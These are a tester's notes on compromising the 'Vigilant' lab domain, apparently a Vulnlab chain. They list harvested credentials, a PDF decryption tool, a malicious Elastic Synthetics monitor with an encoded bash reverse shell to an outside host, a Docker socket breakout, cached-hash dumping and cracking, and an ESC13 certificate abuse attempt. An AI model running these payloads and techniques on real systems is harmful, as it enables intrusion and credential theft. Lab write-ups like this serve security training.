Vigilant (Chain)

This is not a writeup, just my notes about the machine.

Operating System: Microsoft Windows Server 2022 Standard

Chain: True (2 Machines)

Credentials

Username	Password	Method	Scope
svc_auditreporter	DeVeLoPeR712	Extracted from .dll	Domain user
Pamela.Clark	Vigilant@Tech2024	Extracted from decrypted PDF	Domain user
Alex.Powell	Vigilant_Market2024	Extracted from decrypted PDF	Domain user
Edwin.Dixon	Vigilant_Finance$	Extracted from decrypted PDF	Domain user
Daniel.Washington	Vigilant&Strategy!	Extracted from decrypted PDF	Domain user

✅ Valid Usernames

Adrian.Hunter
Adrian.Ray
Albert.Shelton
Alexa.Chavez
Alex.Alexander
Alex.Bailey
Alex.Powell
Alyssa.Gonzalez
Amelia.Morales
Amy.Ross
Arlene.Fowler
Audrey.Austin
Avery.Sanchez
Bertha.Hopkins
Bessie.Fuller
Brandie.Mason
Brandon.Lambert
Brandy.Edwards
Byron.Gordon
Carole.Dean
Caroline.Chavez
Carter.Ruiz
Chad.Meyer
Charlene.Flores
Charlene.Jenkins
Cindy.Steeves
Clara.Carlson
Clarence.Dunn
Claude.Stone
Daniel.Washington
Dan.Wells
Deanna.Johnston
Denise.Grant
Dylan.Mason
Eduardo.Anderson
Eduardo.Burns
Edwin.Dixon
Erika.Armstrong
Ethan.Carter
Ethel.Armstrong
Everett.Morrison
Frances.Lewis
Gabriella.Morrison
Gabriel.Stewart
Heather.Green
Isobel.Martin
Ivan.Mendoza
Jerome.Perry
John.Chapman
Kristina.Perry
Lauren.Cooper
Leah.Sullivan
Leo.Mitchell
Leona.Adams
Lewis.Newman
Lily.Young
Marcia.Hudson
Nathan.Stanley
Nicole.Thompson
Pamela.Clark
Patrick.Hart
Paul.Brewer
Phyllis.Silva
Randy.Tucker
Rene.Chapman
Robin.Wagner
Rodney.Smith
Roland.Johnson
Scott.Rivera
Shannon.Simpson
Sophia.Kelley
Stacy.Richardson
svc_auditreporter
svc_elastic
svc_iis
Tiffany.Nelson
Timmothy.Bates
Tonya.Lynch
Travis.Willis
Tristan.Payne
Tyler.Holmes
Tyrone.Carroll
Veronica.Ruiz
Wesley.Rogers
William.Fernandez

🔑 Passwords list

Information Gathering

Nmap Scan

PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server
5601/tcp open  esmagent
9200/tcp open  wap-wsp

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Service enumeration

vigilant.vl

DNS

• Not vulnerable to DNS Zone transfer

SMB (enum4linux-ng)

• Domain SID: S-1-5-21-2615182196-3196294898-3079774137

• Root/parent domain

• SMB signing: true (Not vulnerable to NTLM Relay attacks)

• NetBIOS computer name: DC

• NetBIOS domain name: VIGILANT

• Domain: vigilant.vl

• FQDN: DC.vigilant.vl

• Server allows null session authentication

• server allows guest session authentication (useful for enumeation)

HTTP: 5601

Elastic instance

10.10.145.214

HTTP:80

Compromise SRV

Initial Foothold on SRV

Discovering a sensitive files on SMB

❯ nxc smb vigilant.vl  -u 'Intrusionz3r0' -p '' --shares  -M spider_plus
❯ nxc smb vigilant.vl  -u 'Intrusionz3r0' -p '' --shares  -M spider_plus -o DOWNLOAD_FLAG=True

❯ tree /tmp/nxc_hosted/nxc_spider_plus/10.10.145.213
/tmp/nxc_hosted/nxc_spider_plus/10.10.145.213
└── ITShare
    └── IT_Support
        ├── ADAudit
        │   ├── ADAudit.dll
        │   ├── ADAuditLib.dll
        │   ├── ADAuditLib.pdb
        │   ├── ADAudit.pdb
        │   ├── ADAudit.runtimeconfig.json
        │   ├── itext.bouncy-castle-connector.dll
        │   ├── itext.pdfua.dll
        │   ├── Microsoft.DotNet.PlatformAbstractions.dll
        │   ├── Microsoft.Extensions.DependencyInjection.Abstractions.dll
        │   ├── Microsoft.Extensions.Logging.dll
        │   └── Microsoft.Extensions.Primitives.dll
        └── ADAuditReports
            └── Password_Strength_Report_encrypted.pdf

5 directories, 12 files

Valuable file: Password_Strength_Report_encrypted.pdf

Discovering a domain user credentials in the ADAudit.dll

During the enumeration the tester found ADAudit.dll which containing svc_auditreporter's plaintext credentials.

Credentials: svc_auditreporter : DeVeLoPeR712

Decrypting pdf

using System;
using System.IO;

class PDFDecryptTool
{
    static void Main(string[] args)
    {
        Console.WriteLine("PDF Decryption Tool");
        Console.WriteLine("-------------------\n");

        if (args.Length == 0 || args[0] == "/?")
        {
            ShowHelp();
            return;
        }

        try
        {
            string inputFile = args[0];
            string outputFile = args.Length > 1 ? args[1] : GenerateOutputPath(inputFile);

            Console.WriteLine($"Decrypting: {inputFile}");
            DecryptFile(inputFile, outputFile);
            Console.WriteLine($"Success!\nDecrypted file saved to: {outputFile}");
        }
        catch (Exception ex)
        {
            Console.WriteLine($"\nERROR: {ex.Message}");
        }
    }

    static void ShowHelp()
    {
        Console.WriteLine("Usage:");
        Console.WriteLine("  PDFDecryptTool.exe <encrypted_file> [output_file]");
        Console.WriteLine("\nExamples:");
        Console.WriteLine("  PDFDecryptTool.exe report_encrypted.pdf");
        Console.WriteLine("  PDFDecryptTool.exe encrypted.pdf decrypted.pdf");
    }

    static void DecryptFile(string inputPath, string outputPath)
    {
        if (!File.Exists(inputPath))
            throw new FileNotFoundException("Input file not found");

        byte[] data = File.ReadAllBytes(inputPath);
        byte[] key = GenerateKey(data.Length);

        Unshuffle(ref data);

        for (int i = 0; i < data.Length; i++)
        {
            data[i] = (byte)((data[i] << 4) | (data[i] >> 4)); 
            data[i] ^= key[i % key.Length]; 
        }

        File.WriteAllBytes(outputPath, data);
    }

    static byte[] GenerateKey(int length)
    {
        byte[] key = new byte[length];
        new Random(12345).NextBytes(key); 
        return key;
    }

    static void Unshuffle(ref byte[] data)
    {
        for (int i = 0; i < data.Length - 1; i += 2)
        {
            // Swap adjacent bytes
            byte temp = data[i];
            data[i] = data[i + 1];
            data[i + 1] = temp;
        }
    }

    static string GenerateOutputPath(string inputPath)
    {
        string dir = Path.GetDirectoryName(inputPath);
        string name = Path.GetFileNameWithoutExtension(inputPath)
            .Replace("_encrypted", "")
            .Replace("_crypted", "");
        string ext = Path.GetExtension(inputPath);

        return Path.Combine(dir, $"{name}_decrypted{ext}");
    }
}

PS C:\Temp\>PDFDecryptTool.exe Password_Strength_Report_encrypted.pdf decrypted.pdf
PDF Decryption Tool
-------------------

Decrypting: Password_Strength_Report_encrypted.pdf
Success!
Decrypted file saved to: decrypted.pdf

FLARE-VM Sun 05/04/2025  2:06:44.41

Authenticating on Elastic

The tester authenticate on Elastic using Pamela.clark credentials

Discovering Pamela.clark is a superuser

Getting a reverse shell using

The tester configured a monitor in http://10.10.224.229:5601/app/synthetics/add-monitor

step('Trying to execute commands', async () => {
  await page.goto('file:///etc/passwd');
});

Creating a synthetics project

❯ npm install -g @elastic/synthetics
❯ npx @elastic/synthetics init Abusing
Need to install the following packages:
  @elastic/synthetics@1.18.0
Ok to proceed? (y) Y
> Initializing Synthetics project in 'Abusing'
✔ Enter Elastic Kibana URL or Cloud ID · http://10.10.224.229:5601/
✔ What is your API key · ************************************************************
✔ Select the locations where you want to run monitors · Marketing Page (private)
✔ Set default schedule in minutes for all monitors · 1
✔ Choose project id to logically group monitors · Abusing
✔ Choose the target Kibana space · default
> Setting up project using NPM...
Wrote to /home/Intrusionz3r0/Documents/Vulnlabs/Vigilant/Content/Abusing/package.json:

{
  "name": "abusing",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "keywords": [],
  "author": "",
  "license": "ISC"
}


> Installing @elastic/synthetics library...

added 142 packages, and audited 143 packages in 14s

29 packages are looking for funding
  run `npm fund` for details

2 moderate severity vulnerabilities

Some issues need review, and may require choosing
a different dependency.

Run `npm audit` for details.
> Writing Abusing/synthetics.config.ts.
> Writing Abusing/journeys/advanced-example-helpers.ts.
> Writing Abusing/journeys/advanced-example.journey.ts.
> Writing Abusing/README.md.
> Writing Abusing/journeys/example.journey.ts.
> Writing Abusing/lightweight/heartbeat.yml.
> Writing Abusing/.github/workflows/run-synthetics.yml.
> Writing Abusing/package.json.

All set, you can run below commands inside: /home/Intrusionz3r0/Documents/Vulnlabs/Vigilant/Content/Abusing:

  Run synthetic tests: npm run test

  Push monitors to Kibana: SYNTHETICS_API_KEY=<value> npm run push

  Configure API Key via `SYNTHETICS_API_KEY` env variable or --auth CLI flag.

Visit https://www.elastic.co/guide/en/observability/current/synthetic-run-tests.html to learn more.

Creating a malicious monitor

The tester modified journeys/example.journey.ts as follows:

import { journey, step, monitor, expect } from '@elastic/synthetics';

journey('My Example Journey', ({ page, params }) => {
  monitor.use({
    id: 'example-monitor',
    schedule: 1,
  });

  step('launch application', async () => {
    await page.goto('http://localhost/');
    const { execSync } = require('child_process');
    execSync('echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjguNS40OC8xMjM0IDA+JjE=" | base64 -d | bash', { stdio: 'inherit' });
  });

  step('assert title', async () => {
    const header = await page.locator('h1');
    expect(await header.textContent()).toBe('todos');
  });
});

❯ SYNTHETICS_API_KEY=KEY npm run push

Compromise SRV via Docker Breakout

Discovering docker.sock was exposed

elastic-agent@srv:/opt$ find / -name "docker.sock" 2>/dev/null
/run/docker.sock

Escaping to the container via Docker breakout using SOCK method

elastic-agent@srv:/dev/shm$ sh deepce.sh --exploit SOCK --command "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjUuNDgvNTU1NSAwPiYx|base64 -d|bash"

                      ##         .
                ## ## ##        ==
             ## ## ## ##       ===
         /"""""""""""""""""\___/ ===
    ~~~ {~~ ~~~~ ~~~ ~~~~ ~~~ ~ /  ===- ~~~
         \______ X           __/
           \    \         __/
            \____\_______/
          __
     ____/ /__  ___  ____  ________
    / __  / _ \/ _ \/ __ \/ ___/ _ \   ENUMERATE
   / /_/ /  __/  __/ /_/ / (__/  __/  ESCALATE
   \__,_/\___/\___/ .___/\___/\___/  ESCAPE
                 /_/

=====================================( Exploiting Sock )======================================

[+] Preparing Exploit  
[+] Exploit Type ............. Custom Command
[+] Custom Command ........... echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjUuNDgvNTU1NSAwPiYx|base64 -d|bash
[+] Clean up ................. Automatic on container exit

[+] Creating container ..... 63b5a86f1784dd3586f30bc730b5700727fa7a0617bf1a4c55cf7248a2044e26
[+] If the shell dies you can restart your listener and run the start command to fire it again 
Start Command: curl -s -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/63b5a86f1784dd3586f30bc730b5700727fa7a0617bf1a4c55cf7248a2044e26/start
Logs Command: curl -s --unix-socket /var/run/docker.sock "http://localhost/containers/63b5a86f1784dd3586f30bc730b5700727fa7a0617bf1a4c55cf7248a2044e26/logs?stderr=1&stdout=1" --output -
[+] Once complete remember to tidy up by stopping and removing your container with following commands 
Stop Command: curl -s -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/63b5a86f1784dd3586f30bc730b5700727fa7a0617bf1a4c55cf7248a2044e26/stop
Remove Command: curl -s -XDELETE --unix-socket /var/run/docker.sock http://localhost/containers/63b5a86f1784dd3586f30bc730b5700727fa7a0617bf1a4c55cf7248a2044e26
[+] Starting container ..... Success
[+] Sleeping for ........... 2s
[+] Fetching logs .......... Success
[+] Exploit completed ..... :)
==============================================================================================

Compromising Domain Controller

Initial foothold on DC

Discovering cache credentials

root@srv:/dev/shm# ./linikatz.sh
 _ _       _ _         _
| (_)_ __ (_) | ____ _| |_ ____
| | | '_ \| | |/ / _` | __|_  /
| | | | | | |   < (_| | |_ / /
|_|_|_| |_|_|_|\_\__,_|\__/___|

             =[ @timb_machine ]=

I: [freeipa-check] FreeIPA AD configuration
-rw-r--r-- 1 root root 2169 Jul 25  2022 /etc/pki/fwupd/GPG-KEY-Linux-Foundation-Firmware
-rw-r--r-- 1 root root 959 Jul 25  2022 /etc/pki/fwupd/GPG-KEY-Linux-Vendor-Firmware-Service
-rw-r--r-- 1 root root 1679 Jul 25  2022 /etc/pki/fwupd/LVFS-CA.pem
-rw-r--r-- 1 root root 959 Jul 25  2022 /etc/pki/fwupd-metadata/GPG-KEY-Linux-Vendor-Firmware-Service
-rw-r--r-- 1 root root 2169 Jul 25  2022 /etc/pki/fwupd-metadata/GPG-KEY-Linux-Foundation-Metadata
-rw-r--r-- 1 root root 1679 Jul 25  2022 /etc/pki/fwupd-metadata/LVFS-CA.pem
I: [sss-check] SSS AD configuration
-rw-rw-r-- 1 root root 11567160 May  5 23:20 /var/lib/sss/mc/initgroups
-rw-rw-r-- 1 root root 9253600 May  5 23:20 /var/lib/sss/mc/passwd
-rw-rw-r-- 1 root root 6940392 May  5 23:20 /var/lib/sss/mc/group
-rw-r--r-- 1 root root 22 Mar 24  2024 /var/lib/sss/gpo_cache/vigilant.vl/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
-rw-r--r-- 1 root root 1098 Mar 24  2024 '/var/lib/sss/gpo_cache/vigilant.vl/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/SecEdit/GptTmpl.inf'
-rw------- 1 root root 1286144 Mar  1  2024 /var/lib/sss/db/sssd.ldb
-rw------- 1 root root 2581 May  6 03:25 /var/lib/sss/db/ccache_VIGILANT.VL
-rw------- 1 root root 1286144 May  5 23:20 /var/lib/sss/db/config.ldb
-rw------- 1 root root 1609728 May  6 03:25 /var/lib/sss/db/timestamps_vigilant.vl.ldb
-rw------- 1 root root 2015232 May  6 03:35 /var/lib/sss/db/cache_vigilant.vl.ldb
-rw-r--r-- 1 root root 113 May  5 23:20 /var/lib/sss/pubconf/krb5.include.d/localauth_plugin
-rw-r--r-- 1 root root 15 May  5 23:20 /var/lib/sss/pubconf/krb5.include.d/domain_realm_vigilant_vl
-rw-r--r-- 1 root root 40 May  5 23:20 /var/lib/sss/pubconf/krb5.include.d/krb5_libdefaults
-rw-r--r-- 1 root root 14 May  6 03:25 /var/lib/sss/pubconf/kdcinfo.VIGILANT.VL
-rw------- 1 root root 615 Mar 24  2024 /etc/sssd/sssd.conf
I: [vintella-check] VAS AD configuration
I: [pbis-check] PBIS AD configuration
I: [samba-check] Samba configuration
-rw------- 1 root root 421888 Feb 27  2024 /var/lib/samba/account_policy.tdb
-rw------- 1 root root 421888 Feb 27  2024 /var/lib/samba/share_info.tdb
-rw------- 1 root root 696 Feb 27  2024 /var/lib/samba/group_mapping.tdb
-rw------- 1 root root 421888 Feb 27  2024 /var/lib/samba/private/passdb.tdb
-rw------- 1 root root 430080 Mar 24  2024 /var/lib/samba/private/secrets.tdb
-rw------- 1 root root 8888 May  5 23:20 /var/lib/samba/private/netlogon_creds_cli.tdb
-rw------- 1 root root 528384 Feb 27  2024 /var/lib/samba/registry.tdb
-rw------- 1 root root 32768 May  5 23:20 /var/lib/samba/winbindd_cache.tdb
-rw------- 1 root root 28672 Feb 27  2024 /var/cache/samba/printing/printers.tdb
-rw------- 1 root root 696 Feb 27  2024 /var/cache/samba/netsamlogon_cache.tdb
-rw-r--r-- 1 root root 234 Mar 24  2024 /var/cache/samba/browse.dat
-rw-r--r-- 1 root root 8950 Feb 27  2024 /etc/samba/smb.conf
-rw-r--r-- 1 root root 8 Oct  4  2023 /etc/samba/gdbcommands
I: [kerberos-check] Kerberos configuration
-rw-r--r-- 1 root root 488 May  5 23:20 /etc/krb5.conf
-rw------- 1 root root 1280 May  5 23:24 /etc/krb5.keytab
I: [samba-check] Samba machine secrets
I: [samba-check] Samba hashes
I: [check] Cached hashes
I: [sss-check] SSS hashes
$6$CI3DH6Ihe8SOgnFz$rzgx1xAQK4kz8YoMqQ90LrDmQs9nJEx9CujSE6BWInbeog6Uf1k9vd.Ub1V23KD2DzsK4RIWpWz/5Iw.RcQhp0\00cachedPasswordType\00\01\00\00\00\01\00\00\001
I: [check] Machine Kerberos tickets
I: [sss-check] SSS ticket list
Ticket cache: FILE:/var/lib/sss/db/ccache_VIGILANT.VL
Default principal: SRV$@VIGILANT.VL

Valid starting       Expires              Service principal
05/06/2025 03:25:58  05/06/2025 13:25:58  krbtgt/VIGILANT.VL@VIGILANT.VL
	renew until 05/07/2025 03:25:58, Flags: RIA
	Etype (skey, tkt): aes256-cts-hmac-sha1-96, aes256-cts-hmac-sha1-96 , AD types: 
05/06/2025 03:25:58  05/06/2025 13:25:58  ldap/dc.vigilant.vl@VIGILANT.VL
	renew until 05/07/2025 03:25:58, Flags: RAO
	Etype (skey, tkt): aes256-cts-hmac-sha1-96, aes256-cts-hmac-sha1-96 , AD types: 
<SNIF>
root@srv:/dev/shm# 

Hash found: $6$CI3DH6Ihe8SOgnFz$rzgx1xAQK4kz8YoMqQ90LrDmQs9nJEx9CujSE6BWInbeog6Uf1k9vd.Ub1V23KD2DzsK4RIWpWz/5Iw.RcQhp0

Cracking hash discovered hash

❯ hashcat -m 1800 cached.hash /usr/share/wordlists/rockyou.txt
<SNIF>

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$6$CI3DH6Ihe8SOgnFz$rzgx1xAQK4kz8YoMqQ90LrDmQs9nJEx9CujSE6BWInbeog6Uf1k9vd.Ub1V23KD2DzsK4RIWpWz/5Iw.RcQhp0:&7Ujm*8Ik,(9

Changing Gabriel.Steward's password

❯ nxc smb vigilant.vl -u users.txt -p '&7Ujm*8Ik,(9' --continue-on-success
<SNIF>
SMB         10.10.224.229   445    DC               [-] vigilant.vl\Gabriel.Stewart:&7Ujm*8Ik,(9 STATUS_PASSWORD_EXPIRED 

❯ impacket-changepasswd "vigilant.vl/Gabriel.Stewart:&7Ujm*8Ik,(9"@10.10.224.229 -newpass 'Password123!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Changing the password of vigilant.vl\Gabriel.Stewart
[*] Connecting to DCE/RPC as vigilant.vl\Gabriel.Stewart
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.

Compromise domain controller via ESC13

Discovering a vulnerable template to ESC13

Certificate Templates
  0
    Template Name                       : VigilantAdmins
    Display Name                        : Vigilant Admins
    Certificate Authorities             : vigilant-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectRequireDirectoryPath
                                          SubjectAltRequireUpn
    Enrollment Flag                     : AutoEnrollment
    Private Key Flag                    : 33685504
    Extended Key Usage                  : Smart Card Logon
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 200 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : VIGILANT.VL\Gabriel Stewart
                                          VIGILANT.VL\Domain Admins
                                          VIGILANT.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : VIGILANT.VL\Administrator
        Write Owner Principals          : VIGILANT.VL\Domain Admins
                                          VIGILANT.VL\Enterprise Admins
                                          VIGILANT.VL\Administrator
        Write Dacl Principals           : VIGILANT.VL\Domain Admins
                                          VIGILANT.VL\Enterprise Admins
                                          VIGILANT.VL\Administrator
        Write Property Principals       : VIGILANT.VL\Domain Admins
                                          VIGILANT.VL\Enterprise Admins
                                          VIGILANT.VL\Administrator

Requirements

1. The certificate template specifies an issuance policy (msPKI-Certificate-Policy )

#Retrieving certificate template and including its configured certificate issuance policies
*Evil-WinRM* PS C:\Users\Gabriel.Stewart\Documents> Get-ADObject -Filter {Name -eq "VigilantAdmins"} -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=VIGILANT,DC=VL" -Properties msPKI-Certificate-Policy
DistinguishedName        : CN=VigilantAdmins,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=vigilant,DC=vl
msPKI-Certificate-Policy : {1.3.6.1.4.1.45844.1337.1}
Name                     : VigilantAdmins
ObjectClass              : pKICertificateTemplate
ObjectGUID               : e0821ebc-f1e7-4c66-b952-d308fbf3e80e

1. That issuance policy is linked to a privileged group (msDS-OIDToGroupLink)

#Searching for certificate issuance policies that are linked to Active Directory groups via the msDS-OIDToGroupLink attribute
*Evil-WinRM* PS C:\Users\Gabriel.Stewart\Documents> Get-ADObject -LDAPFilter "(msDS-OIDToGroupLink=*)" -SearchBase "CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=VIGILANT,DC=VL" -Properties msDS-OIDToGroupLink | Format-List Name, msDS-OIDToGroupLink
Name                : 1.C4C92D522EAEB67B6205C6169671A0CE
msDS-OIDToGroupLink : CN=Temporary Admins,OU=VIGILANT,DC=vigilant,DC=vl

1. The linked group meets two conditions:

   1. It is empty (no members)

   2. It has universal scope (i.e., forest-wide group like Enterprise Admins, Schema Admins, or any custom universal group)

#Listing the current members of the "Temporary Admins"
*Evil-WinRM* PS C:\Users\Gabriel.Stewart\Documents> Get-ADGroupMember -Identity "Temporary Admins"
#EMPTY
*Evil-WinRM* PS C:\Users\Gabriel.Stewart\Documents> 

universal scope

1. The certificate template allows Client Authentication

Certificate Templates
  0
    Template Name                       : VigilantAdmins
    Display Name                        : Vigilant Admins
    Certificate Authorities             : vigilant-CA
    Enabled                             : True
    Client Authentication               : True

1. 🎉 The compromised user/computer can enroll in the certificate template.

Abusing ESC13 using Certipy

Unfortunately the machine is broken and Cannot continue due the KDC CA cert has expired.

❯ certipy-ad req -u 'gabriel.stewart' -p 'Password123!' -ca vigilant-CA -target DC.vigilant.vl -template 'VigilantAdmins' -dc-ip 10.10.183.85 -key-size 4096 2>/dev/null
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'Gabriel.Stewart@vigilant.vl'
[*] Certificate object SID is 'S-1-5-21-2615182196-3196294898-3079774137-1334'
[*] Saved certificate and private key to 'gabriel.stewart.pfx'

❯ certipy-ad auth -pfx gabriel.stewart.pfx -dc-ip 10.10.183.85
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: gabriel.stewart@vigilant.vl
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)